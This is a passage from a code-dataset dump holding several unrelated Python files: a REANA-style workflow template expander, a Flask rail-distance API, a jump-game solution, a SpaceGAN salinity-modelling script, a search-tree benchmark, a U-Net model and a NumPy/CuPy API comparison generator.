License; see LICENSE file for more details.\n\n\"\"\"Helper class to execute workflow templates that follow the syntax of the\nREANA serial workflow specifications.\n\"\"\"\n\nimport os\n\nfrom string import Template\n\nimport flowserv.error as err\nimport flowserv.model.template.parameter as tp\n\n\nclass Step(object):\n \"\"\"List of command line statements that are executed in a given\n environment. The environment can, for example, specify a Docker image.\n \"\"\"\n def __init__(self, env, commands=None):\n \"\"\"Initialize the object properties.\n\n Parameters\n ----------\n env: string\n Execution environment name\n commands: list(string), optional\n List of command line statements\n \"\"\"\n self.env = env\n self.commands = commands if commands is not None else list()\n\n def add(self, cmd):\n \"\"\"Append a given command line statement to the list of commands in the\n workflow step.\n\n Parameters\n ----------\n cmd: string\n Command line statement\n\n Returns\n -------\n flowserv.model.template.step.Step\n \"\"\"\n self.commands.append(cmd)\n return self\n\n\nclass SerialWorkflow(object):\n \"\"\"Wrapper around a workflow template for serial workflow specifications\n that are following the basic structure of REANA serial workflows.\n\n The methods to get the list of commands, output files and upload files are\n modeled as properties to avoid confusion with the same properties for the\n remote workflow handle.\n \"\"\"\n def __init__(self, template, arguments):\n \"\"\"Initialize the object properties.\n\n Parameters\n ----------\n template: flowserv.model.template.base.WorkflowTemplate\n Workflow template containing the parameterized specification and\n the parameter declarations\n arguments: dict\n Dictionary of argument values for parameters in the template. Maps\n the parameter identifier to the provided argument value.\n \"\"\"\n self.template = template\n self.arguments = arguments\n\n def commands(self):\n \"\"\"Get expanded commands from template workflow specification. 
The\n commands within each step of the serial workflow specification are\n expanded for the given set of arguments and appended to the result\n list of commands.\n\n Returns\n -------\n list(flowserv.model.template.step.Step)\n\n Raises\n ------\n flowserv.error.InvalidTemplateError\n flowserv.error.MissingArgumentError\n \"\"\"\n workflow_spec = self.template.workflow_spec\n # Get the input/parameters dictionary from the workflow specification\n # and replace all references to template parameters with the given\n # arguments or default values.\n workflow_parameters = tp.replace_args(\n spec=workflow_spec.get('inputs', {}).get('parameters', {}),\n arguments=self.arguments,\n parameters=self.template.parameters\n )\n # Add any workflow argument that is not contained in the modified\n # parameter list as a workflow parameter that is available for\n # replacement.\n for key in self.arguments:\n if key not in workflow_parameters:\n workflow_parameters[key] = str(self.arguments[key])\n # Add all command stings in workflow steps to result after replacing\n # references to parameters\n result = list()\n spec = workflow_spec.get('workflow', {}).get('specification', {})\n for step in spec.get('steps', []):\n env = step.get('environment')\n if tp.is_parameter(env):\n env = workflow_parameters[tp.NAME(env)]\n script = Step(env=env)\n for cmd in step.get('commands', []):\n if tp.is_parameter(cmd):\n cmd = workflow_parameters[tp.NAME(cmd)]\n script.add(Template(cmd).substitute(workflow_parameters))\n result.append(script)\n return result\n\n def output_files(self):\n \"\"\"Replace references to template parameters in the list of output\n files in the workflow specification.\n\n Returns\n -------\n list(string)\n\n Raises\n ------\n flowserv.error.InvalidTemplateError\n flowserv.error.MissingArgumentError\n \"\"\"\n workflow_spec = self.template.workflow_spec\n return tp.replace_args(\n spec=workflow_spec.get('outputs', {}).get('files', {}),\n arguments=self.arguments,\n parameters=self.template.parameters\n )\n\n def upload_files(self):\n \"\"\"Get a list of all input files from the workflow specification that\n need to be uploaded for a new workflow run.\n\n Returns a list of tuples containing the full path to the source file on\n local disk and the relative target path for the uploaded file.\n\n Raises errors if a parameter value is missing or if an unknown source\n file is referenced.\n\n Returns\n -------\n list((string, string))\n\n Raises\n ------\n flowserv.error.MissingArgumentError\n flowserv.error.UnknownFileError\n \"\"\"\n workflow_spec = self.template.workflow_spec\n basedir = self.template.sourcedir\n files = workflow_spec.get('inputs', {}).get('files', [])\n result = list()\n for val in files:\n # Set source and target values depending on whether the list\n # entry references a template parameter or not.\n if tp.is_parameter(val):\n # If the value in the files listing is a parameter it is\n # assumed that this is a file parameter. 
If no argument value\n # is given for the parameter a default value will be used as\n # source and target path.\n var = tp.NAME(val)\n para = self.template.parameters.get(var)\n arg = self.arguments.get(var)\n if arg is None:\n if para.default_value is None:\n raise err.MissingArgumentError(var)\n source = os.path.join(basedir, para.default_value)\n target = para.default_value\n else:\n # Get path to source file and the target path from the\n # input file handle.\n source = arg.source()\n target = arg.target()\n else:\n source = os.path.join(basedir, val)\n target = val\n # Add upload file source and target path to the result list.\n result.append((source, target))\n return result\n","sub_path":"flowserv/model/workflow/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263361931","text":"from flask import request,json,Response,Blueprint\nfrom ..model.rail_model import RailModel,RailSchema\nfrom ..utils.data_reader import DataReader\nfrom ..utils.shared_response import SharedResponse\nimport traceback\nimport logging\n\nlogger=logging.getLogger(__name__+\".rail_controller\")\ndata_reader=DataReader()\nrail_schema=RailSchema()\nclass RailController:\n\n def refresh():\n try:\n data_reader=DataReader()\n return SharedResponse.success_response({\"message\":\"Data refreshed Successfully\"})\n except Exception as err:\n logger.error(err)\n traceback.print_exc()\n return SharedResponse.server_error_response()\n\n def get_all():\n\n try:\n rail_data_frame=data_reader.get_all()\n rail_list=[]\n size=rail_data_frame.shape[0]\n\n for i in range(0,size):\n rail_model=RailModel(rail_data_frame.iloc[i])\n rail_list.append(rail_model)\n \n serialize_rail_model=rail_schema.dump(rail_list,many=True)\n \n\n return SharedResponse.success_response(serialize_rail_model)\n \n except Exception as err:\n logger.error(err)\n traceback.print_exc()\n return SharedResponse.server_error_response()\n \n\n \n def get_all_by_station_name_pattern(station_name):\n\n try:\n if station_name is None :\n return SharedResponse.validation_error_response()\n rail_data_frame=data_reader.get_all_by_station_name_pattern(station_name)\n rail_list=[]\n size=rail_data_frame.shape[0]\n for i in range(0,size):\n rail_model=RailModel(rail_data_frame.iloc[i])\n rail_list.append(rail_model)\n \n serialize_rail_model=rail_schema.dump(rail_list,many=True)\n \n\n return SharedResponse.success_response(serialize_rail_model)\n\n except Exception as err:\n logger.error(err)\n traceback.print_exc()\n return SharedResponse.server_error_response()\n\n def get_distance(from_station_code,to_station_code):\n\n try:\n \n if from_station_code is None or to_station_code is None:\n return SharedResponse.validation_error_response()\n\n from_rail_data_frame=data_reader.get_by_station_code(from_station_code)\n to_rail_data_frame=data_reader.get_by_station_code(to_station_code)\n\n from_rail_data_frame_size=from_rail_data_frame.shape[0]\n to_rail_data_frame_size=to_rail_data_frame.shape[0]\n\n if from_rail_data_frame_size==0 or to_rail_data_frame_size==0 :\n return SharedResponse.id_not_found_error_response()\n \n response_message_list=[]\n for i in range(from_rail_data_frame_size):\n for j in range(to_rail_data_frame_size):\n if from_rail_data_frame.iloc[i]['Connection']==to_rail_data_frame.iloc[j]['Connection']:\n distance=abs(from_rail_data_frame.iloc[i]['Distance in Kms']-to_rail_data_frame.iloc[j]['Distance in Kms'])\n 
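# one result entry per line ('Connection') served by both stations\n                            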
response_message={\"from\":from_station_code,\"to\":to_station_code,\"Distance in Kms\":round(distance,2),\"Connection\":to_rail_data_frame.iloc[j]['Connection']}\n                            response_message_list.append(response_message)\n                \n\n            if len(response_message_list)==0:\n                return SharedResponse.common_line_not_found_error_response()\n            \n            return SharedResponse.success_response(response_message_list)\n            \n\n        except Exception as err:\n            logger.error(err)\n            traceback.print_exc()\n            return SharedResponse.server_error_response()\n        \n","sub_path":"src/controller/rail_controller.py","file_name":"rail_controller.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"173161855","text":"class Solution:\n    def canJump(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: bool\n        \"\"\"\n        leftest = len(nums) - 1\n        for i in range(len(nums) - 2, -1, -1):\n            if i + nums[i] >= leftest:\n                leftest = i\n        return leftest == 0\n","sub_path":"0055_JumpGame.py","file_name":"0055_JumpGame.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487210668","text":"import matplotlib\nmatplotlib.use('Agg')\n\nimport pandas as pd\nimport numpy as np\nimport esda\n# import pysal\nimport libpysal\nimport torch\nimport torch.nn as nn\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, QuantileTransformer\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n# from IPython.display import display, clear_output\nimport warnings\n\nwarnings.simplefilter(\"ignore\")\nimport pdb\nimport sys\nsys.path.append('src')\nfrom spacegan_method import SpaceGAN\nfrom spacegan_selection import get_spacegan_config, compute_metrics\nfrom spacegan_utils import gaussian, rmse, mad, pearsoncorr, mie, moranps, mase_1, mape, smape, eool, msis_1, get_neighbours_featurize\nfrom spacegan_config import Generator, Discriminator\n\n# %matplotlib inline\nfig_save_prefix = 'img/'\n\n# dataset\ndf = pd.read_csv(\"data/raw_data.csv\",nrows=101) # already dropped position_key column\ncoord_vars = [\"longitude\", \"latitude\"] #Define spatial coordinates\ncond_vars = ['unix_time', 'depth', 'conductivity', 'density', 'temperature'] + coord_vars #Define the predictor variables\ncont_vars = ['unix_time', 'depth', 'conductivity', 'density', 'temperature', 'salinity'] + coord_vars #Define which neighbour features to use as context variables\noutput_vars = ['salinity'] #Define output...just to see if it works\nneighbours = 50\n\n# plotting observed salinity distribution at lon-lat location\nfig, ax1 = plt.subplots(1, 1, figsize=(7, 5))\ngen_seq = df[[\"salinity\"]].values.astype(float)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n    ax1.scatter(lat, long, color=c, s=5) # s denotes marker size\n    \nax1.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax1.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax1.set_title(\"Observed\")\nfig.savefig(fig_save_prefix+'p1_noaa.png')\n\n\n\n# problem configuration\nprob_config = {\"epochs\": 3000,\n               \"batch_size\": 100,\n               \"device\": torch.device(\"cuda\"),\n               \"cond_dim\": len(cond_vars) + (neighbours * len(cont_vars)), # conditional information size\n               \"output_dim\": len(output_vars), # size of output\n               \"noise_dim\": len(cond_vars) + (neighbours * len(cont_vars)), # size of noise\n               \"noise_type\": 
gaussian, # type of noise and dimension used\n \"noise_params\": None, # other params for noise (loc, scale, etc.) pass as a dict\n \"scale_x\": StandardScaler(), # a sklearn.preprocessing scaling method\n \"scale_y\": StandardScaler(), # a sklearn.preprocessing scaling method\n \"print_results\": False,\n # additional Generator params\n \"gen_opt\": torch.optim.SGD,\n \"gen_opt_params\": {\"lr\": 0.01},\n # additional Discriminator params\n \"disc_opt\": torch.optim.SGD,\n \"disc_opt_params\": {\"lr\": 0.01},\n # loss function\n \"adversarial_loss\": torch.nn.BCELoss()\n }\n\n# checkpointing configuration\ncheck_config = {\n \"check_interval\": 100, # for model checkpointing\n \"generate_image\": False,\n \"n_samples\": 50,\n \"perf_metrics\": {\"RMSE\": rmse,\n \"MIE\": mie,\n },\n \"pf_metrics_setting\": {\n \"RMSE\": {\"metric_level\": \"agg_metrics\",\n \"rank_function\": np.argmin,\n \"agg_function\": lambda x: np.array(x)\n },\n \"MIE\": {\"metric_level\": \"agg_metrics\",\n \"rank_function\": np.argmin,\n \"agg_function\": lambda x: np.array(x)\n },\n },\n \"agg_funcs\": {\"avg\": np.mean,\n \"std\": np.std\n },\n \"sample_metrics\": False,\n \"agg_metrics\": True\n}\n\nmodel_save_prefix = 'saved_models/noaa/'\n\n# train the model\n\n# neighbours\ndf, neighbour_list = get_neighbours_featurize(df, coord_vars, cont_vars, neighbours)\n\n# data structures\ntarget = df[output_vars].values\ncond_input = df[cond_vars + neighbour_list].values\ncoord_input = df[coord_vars].values\nprob_config[\"output_labels\"] = output_vars\nprob_config[\"input_labels\"] = cond_vars + neighbour_list\n\n# pre-instantiation\ndisc_method = Discriminator(prob_config[\"output_dim\"], prob_config[\"cond_dim\"])\ndisc_method.to(prob_config[\"device\"])\ngen_method = Generator(prob_config[\"cond_dim\"], prob_config[\"noise_dim\"], prob_config[\"output_dim\"])\ngen_method.to(prob_config[\"device\"])\n\n# training SpaceGAN\nspacegan = SpaceGAN(prob_config, check_config, disc_method, gen_method)\nspacegan.train(x_train=cond_input, y_train=target, coords=coord_input)\n\n# export final model and data\nspacegan.checkpoint_model(spacegan.epochs) \nspacegan.df_losses.to_pickle(model_save_prefix+\"grid_spaceganlosses.pkl.gz\")\n\n\n\n# pick the best Generator (G) as determined by the MIE and the RMSE criterion.\n\n# computing metrics\ngan_metrics = compute_metrics(target, cond_input, prob_config, check_config, coord_input, neighbours)\n\n# selecting and sampling gan\nfor criteria in list(check_config[\"perf_metrics\"].keys()):\n # find best config\n criteria_info = check_config[\"pf_metrics_setting\"][criteria]\n perf_metrics = gan_metrics[criteria_info[\"metric_level\"]]\n perf_values = criteria_info[\"agg_function\"](perf_metrics[[criteria]])\n best_config = perf_metrics.index[criteria_info[\"rank_function\"](perf_values)]\n\n # get and set best space gan\n best_spacegan = get_spacegan_config(int(best_config), prob_config, check_config, cond_input, target)\n # training samples\n gan_samples_df = pd.DataFrame(index=range(cond_input.shape[0]), columns=cond_vars + neighbour_list + output_vars)\n gan_samples_df[cond_vars + neighbour_list] = cond_input\n gan_samples_df[output_vars] = target\n for i in range(check_config[\"n_samples\"]):\n gan_samples_df[\"sample_\" + str(i)] = best_spacegan.predict(gan_samples_df[cond_vars + neighbour_list])\n\n # export results\n gan_samples_df.to_pickle(model_save_prefix+\"grid_\" + criteria + 
\".pkl.gz\")\ngan_metrics[\"agg_metrics\"].to_pickle(model_save_prefix+\"grid_checkmetrics.pkl.gz\")\n\n\n\n# plot the results!\n\n# show highlights\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))\ngan_metrics[\"agg_metrics\"].plot(ax=ax1)\n\n# generate chart\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(50)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax2.scatter(lat, long, color=c, s=5)\nax2.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax2.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax2.set_title(\"SpaceGAN - Best \" + criteria)\nfig.savefig(fig_save_prefix+'p2_noaa.png')\n\n\n# plot the best generator after RMSE selection\n\n#load rmse selection results\ngan_samples_df = pd.read_pickle(model_save_prefix+\"grid_RMSE.pkl.gz\")\n# gan_samples_df = pd.read_pickle(\"./grid_RMSE.pkl.gz\") \n\n# show highlights\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))\ngan_metrics[\"agg_metrics\"].plot(ax=ax1)\n\n# generate chart\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(20)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax2.scatter(lat, long, color=c, s=5)\nax2.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax2.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax2.set_title(\"SpaceGAN - Best RMSE\")\nfig.savefig(fig_save_prefix+'p3_noaa.png')\n\n\n# selection\n\n# iteration = 8000\niteration = 1000\n\n# get and set best space gan\niter_spacegan = get_spacegan_config(iteration, prob_config, check_config, cond_input, target)\n\n# training samples\ngan_samples_df = pd.DataFrame(index=range(cond_input.shape[0]), columns=cond_vars + neighbour_list + output_vars)\ngan_samples_df[cond_vars + neighbour_list] = cond_input\ngan_samples_df[output_vars] = target\nfor i in range(check_config[\"n_samples\"]):\n # gan_samples_df[\"sample_\" + str(i)] = iter_spacegan.predict(gan_samples_df[cond_vars + neighbour_list])\n gan_samples_df[\"sample_\" + str(i)] = iter_spacegan.predict(cond_input)\n\n# generate chart\nfig, ax1 = plt.subplots(1, 1, figsize=(7, 5))\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(1)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax1.scatter(lat, long, color=c, s=5)\nax1.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax1.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax1.set_title(\"SpaceGAN (RMSE) - Iteration \" + str(iteration))\nfig.savefig(fig_save_prefix+'p4_noaa.png')\n\n\n\n\n# iteration = 8000\niteration = 1000\n\n# get and set best space gan\niter_spacegan = get_spacegan_config(iteration, prob_config, check_config, cond_input, target)\n\n#load mie selection results\n# gan_samples_df = pd.read_pickle(model_save_prefix+\"grid_MIE.pkl.gz\") #is this line not needed??\n# gan_samples_df = pd.read_pickle(\"./grid_MIE.pkl.gz\") \n\n# training samples\ngan_samples_df = pd.DataFrame(index=range(cond_input.shape[0]), columns=cond_vars + neighbour_list + output_vars)\ngan_samples_df[cond_vars + neighbour_list] = cond_input\ngan_samples_df[output_vars] = target\nfor i in range(check_config[\"n_samples\"]):\n gan_samples_df[\"sample_\" + str(i)] = iter_spacegan.predict(cond_input)\n \n# 
generate chart\nfig, ax1 = plt.subplots(1, 1, figsize=(7, 5))\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(1)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax1.scatter(lat, long, color=c, s=5)\nax1.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax1.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax1.set_title(\"SpaceGAN (MIE) - Iteration \" + str(iteration))\nfig.savefig(fig_save_prefix+'p5_noaa.png')\n\n\n\n\n#Load loss data\nloss_df = pd.read_pickle(model_save_prefix+\"grid_spaceganlosses.pkl.gz\")\n# loss_df = pd.read_pickle(\"./grid_spaceganlosses.pkl.gz\")\n\n#Plot losses and selection criteria side by side\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))\n\nloss_df.plot(ax=ax1,alpha=0.7)\nax1.set_title(\"Generator and Discriminator loss during training\")\n\ngan_metrics_norm = gan_metrics[\"agg_metrics\"]\ngan_metrics_norm[\"RMSE\"] = 2 - (np.array(gan_metrics_norm[\"RMSE\"]) / max(np.array(gan_metrics_norm[\"RMSE\"]))) #Normalize RMSE metric for better comparison\ngan_metrics_norm.plot(ax=ax2)\nax2.set_title(\"Selection criteria during training\")\nfig.savefig(fig_save_prefix+'p6_noaa.png')\n","sub_path":"toy_noaa.py","file_name":"toy_noaa.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142481385","text":"from bst import BST\nfrom avl import AVL\nfrom rb import RedBlackTree\nfrom string import ascii_letters\nfrom random import seed, shuffle, choices\nimport itertools\nfrom collections import defaultdict\nfrom time import time\nimport tracemalloc\n\nseed(714)\n\n\ndef get_random_string(n):\n arr = choices(ascii_letters, k=n)\n return \"\".join(arr)\n\n\ndef get_key_list(key_type, num_of_key):\n key_list = []\n if key_type == \"int\":\n for i in range(1, num_of_key + 1):\n key_list.append(i)\n else:\n n = 52\n for i in range(1, n + 1):\n for i, item in enumerate(itertools.product(ascii_letters, repeat=i)):\n key_list.append(item)\n if len(key_list) == num_of_key:\n break\n if len(key_list) == num_of_key:\n break\n return key_list\n\n\ndef get_val_list(val_size, num_of_key):\n val_list = []\n for i in range(num_of_key):\n val_list.append(get_random_string(val_size))\n return val_list\n\n\ndef perform_benchmark_insert(tree_list, key_list, val_list, time_dict):\n for tree in tree_list:\n time1 = time()\n for i in range(len(key_list)):\n ret = tree.insert(key_list[i], data=val_list[i])\n assert ret is True\n time2 = time()\n time_dict[\"insert\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark_search(tree_list, key_list, val_list, time_dict):\n for tree in tree_list:\n time1 = time()\n for i in range(len(key_list)):\n ret, att = tree.search(key_list[i])\n assert ret is True and att['data'] == val_list[i]\n time2 = time()\n time_dict[\"search\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark_search_update(tree_list, key_list, val_list, time_dict, new_list):\n for tree in tree_list:\n time1 = time()\n for i in range(len(key_list)):\n ret, att = tree.search(key_list[i])\n assert ret is True and att['data'] == val_list[i]\n ret = tree.update(key_list[i], data=new_list[i])\n assert ret is True\n time2 = time()\n time_dict[\"search_update\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark_delete(tree_list, key_list, val_dict, time_dict):\n for tree in tree_list:\n 
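# wall-clock a full pass of deletions for this tree implementation\n        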
time1 = time()\n for i in range(len(key_list)):\n ret, att = tree.delete(key_list[i])\n assert ret is True and att['data'] == val_dict[key_list[i]]\n time2 = time()\n time_dict[\"delete\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n tree_list = [BST(), AVL(), RedBlackTree()]\n key_list, val_list = get_key_list(key_type, num_of_key), get_val_list(val_size, num_of_key)\n new_val_list = get_val_list(val_size, num_of_key)\n zip_key_val = list(zip(key_list, val_list))\n shuffle(zip_key_val)\n ran_key_list, ran_val_list = zip(*zip_key_val)\n zip_key_val = []\n time_dict = defaultdict(lambda: {})\n if insert_type == \"seq\":\n perform_benchmark_insert(tree_list, key_list, val_list, time_dict)\n else:\n perform_benchmark_insert(tree_list, ran_key_list, ran_val_list, time_dict)\n if search_type == \"seq\":\n perform_benchmark_search(tree_list, key_list, val_list, time_dict)\n else:\n perform_benchmark_search(tree_list, ran_key_list, ran_val_list, time_dict)\n if search_update_type == \"seq\":\n perform_benchmark_search_update(tree_list, key_list, val_list, time_dict, new_val_list)\n new_val_dict = {}\n for i, key in enumerate(key_list):\n new_val_dict[key] = new_val_list[i]\n else:\n perform_benchmark_search_update(tree_list, ran_key_list, ran_val_list, time_dict, new_val_list)\n new_val_dict = {}\n for i, key in enumerate(ran_key_list):\n new_val_dict[key] = new_val_list[i]\n val_list = []\n ran_val_list = []\n # at this step, the data in the tree has been replaced to data in new_val_list\n if delete_type == \"seq\":\n perform_benchmark_delete(tree_list, key_list, new_val_dict, time_dict)\n else:\n perform_benchmark_delete(tree_list, ran_key_list, new_val_dict, time_dict)\n\n return time_dict\n\n\ndef validate_parameters(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n assert key_type in [\"int\", \"str\"]\n assert 0 < num_of_key <= 1600000\n assert 0 < val_size <= 1024\n for i in (insert_type, search_type, search_update_type, delete_type):\n assert i in [\"seq\", \"ran\"]\n\n\ndef print_parameters(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n result_str = (f\"key_type \\t{key_type} \\n\"\n f\"num_of_key \\t{num_of_key} \\n\"\n f\"val_size \\t{val_size} \\n\"\n f\"insert_type \\t{insert_type} \\n\"\n f\"search_type \\t{search_type} \\n\"\n f\"search_update_type \\t{search_update_type}\\n\"\n f\"delete_type \\t{delete_type} \\n\")\n return result_str\n\n\ndef benchmark_main(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n validate_parameters(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type)\n time_dict = perform_benchmark(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type)\n return time_dict\n\n\ndef benchmark_main_wrapper(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n # p = print_parameters(key_type, num_of_key, val_size,\n # insert_type, search_type,\n # search_update_type, delete_type)\n tracemalloc.start()\n time_dict = benchmark_main(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type)\n snapshot = tracemalloc.take_snapshot()\n top_stats = snapshot.statistics('lineno')\n\n # return time_dict\n return time_dict, top_stats\n\n\ndef print_td(td):\n for 
k, k_dict in td.items():\n        print(k)\n        # print()\n        for tree, time in k_dict.items():\n            print(\"\\t\", tree, \"\\t\", time)\n            # print(time)\n\n\nif __name__ == '__main__':\n    for sz in [32, 64, 256, 512, 1024]:\n        td, ts = benchmark_main_wrapper(\"str\", 100, sz, \"ran\", \"ran\", \"ran\", \"ran\")\n        print_td(td)\n","sub_path":"web/impl/bmk.py","file_name":"bmk.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133108589","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.models import Model, load_model\nfrom tensorflow.keras.layers import Input, Concatenate\nfrom tensorflow.keras.layers import Conv2D, MaxPool2D, BatchNormalization\nfrom tensorflow.keras.layers import Dropout, Activation, UpSampling2D\n\ndef conv_block(filters, x):\n    # 'same' padding keeps the spatial size, so encoder and decoder\n    # feature maps line up for the skip connections\n    x = Conv2D(filters=filters, \n               kernel_size=(3,3), \n               padding='same', \n               activation='relu')(x)\n\n    x = BatchNormalization()(x)\n\n    x = Conv2D(filters=filters, \n               kernel_size=(3,3), \n               padding='same', \n               activation='relu')(x)\n    out = BatchNormalization()(x)\n    return out \n\n\ndef down_sample(filters, x):\n    x = MaxPool2D((2,2))(x)\n    out = conv_block(filters, x)\n    return out\n\n\ndef up_sample(filters, x, x1):\n    x = UpSampling2D((2, 2))(x)\n    x = Concatenate()([x1, x])  # Concatenate expects a list of tensors\n    out = conv_block(filters, x)\n    return out\n\nclass Unet(Model):\n    def __init__(self):\n        super(Unet, self).__init__()\n    def call(self, x):\n        # Encoder \n        down1 = conv_block(64, x)\n        down2 = down_sample(128, down1)\n        down3 = down_sample(256, down2)\n        down4 = down_sample(512, down3)\n        down5 = down_sample(1024, down4)\n\n        # Decoder\n        up1 = up_sample(512, down5, down4)\n        up2 = up_sample(256, up1, down3)\n        up3 = up_sample(128, up2, down2)\n        up4 = up_sample(64, up3, down1)\n\n        # 1x1 convolution collapses the channels into a single mask\n        out = Conv2D(filters=1, \n                     kernel_size=(1,1),\n                     padding='valid',\n                     activation='sigmoid')(up4)\n\n        return out\n\n# input side must be divisible by 16 so the four pool/upsample stages match\nimage = np.zeros((1, 512, 512, 3))\nimg_tensor = tf.image.convert_image_dtype(image, dtype=tf.float16)\n\nmodel = Unet()\nmodel(img_tensor)\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\nmodel.summary()\n\n\n    \n\n\n","sub_path":"Deep Learning/CNN/Unet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439627199","text":"import numpy\n\nimport scipy\nimport scipy.linalg\nimport scipy.special\nimport scipy.ndimage\n\nimport cupy\n\nimport cupyx.scipy\nimport cupyx.scipy.linalg\nimport cupyx.scipy.ndimage\nimport cupyx.scipy.special\n\n\ndef _get_functions(obj):\n    return set([\n        n for n in dir(obj)\n        if (n not in ['test']  # not in blacklist\n            and callable(getattr(obj, n))  # callable\n            and not isinstance(getattr(obj, n), type)  # not class\n            and n[0].islower()  # starts with lower char\n            and not n.startswith('__')  # not special methods\n            )\n    ])\n\n\ndef _generate_comparison_rst(base_obj, cupy_obj, base_type):\n    base_funcs = _get_functions(eval(base_obj))\n    cp_funcs = _get_functions(eval(cupy_obj))\n\n    buf = []\n    buf += [\n        '.. csv-table::',\n        '   :header: {}, CuPy'.format(base_type),\n        '',\n    ]\n    for f in sorted(base_funcs):\n        if f in cp_funcs:\n            line = r'   :obj:`{0}.{1}`, :obj:`{2}.{1}`'.format(\n                base_obj, f, cupy_obj)\n        else:\n            line = r'   :obj:`{0}.{1}`, \\-'.format(base_obj, f)\n        buf.append(line)\n\n    buf += [\n        '',\n        '.. 
Summary:',\n        '   Number of NumPy functions: {}'.format(len(base_funcs)),\n        '   Number of functions covered by CuPy: {}'.format(\n            len(cp_funcs & base_funcs)),\n        '   CuPy specific functions:',\n    ] + [\n        '   - {}'.format(f) for f in (cp_funcs - base_funcs)\n    ]\n    return buf\n\n\ndef _section(header, base_obj, cupy_obj, base_type='NumPy'):\n    return [\n        header,\n        '~' * len(header),\n        '',\n    ] + _generate_comparison_rst(base_obj, cupy_obj, base_type) + [\n        '',\n    ]\n\n\ndef generate():\n    buf = []\n\n    buf += [\n        'NumPy / CuPy APIs',\n        '-----------------',\n        '',\n    ]\n    buf += _section(\n        'Module-Level',\n        'numpy', 'cupy')\n    buf += _section(\n        'Multi-Dimensional Array',\n        'numpy.ndarray', 'cupy.ndarray')\n    buf += _section(\n        'Linear Algebra',\n        'numpy.linalg', 'cupy.linalg')\n    buf += _section(\n        'Discrete Fourier Transform',\n        'numpy.fft', 'cupy.fft')\n    buf += _section(\n        'Random Sampling',\n        'numpy.random', 'cupy.random')\n\n    buf += [\n        'SciPy / CuPy APIs',\n        '-----------------',\n        '',\n    ]\n    buf += _section(\n        'Sparse Matrices',\n        'scipy.sparse', 'cupyx.scipy.sparse', 'SciPy')\n    buf += _section(\n        'Sparse Linear Algebra',\n        'scipy.linalg', 'cupyx.scipy.linalg', 'SciPy')\n    buf += _section(\n        'Multidimensional Image Processing',\n        'scipy.ndimage', 'cupyx.scipy.ndimage', 'SciPy')\n    buf += _section(\n        'Special Functions',\n        'scipy.special', 'cupyx.scipy.special', 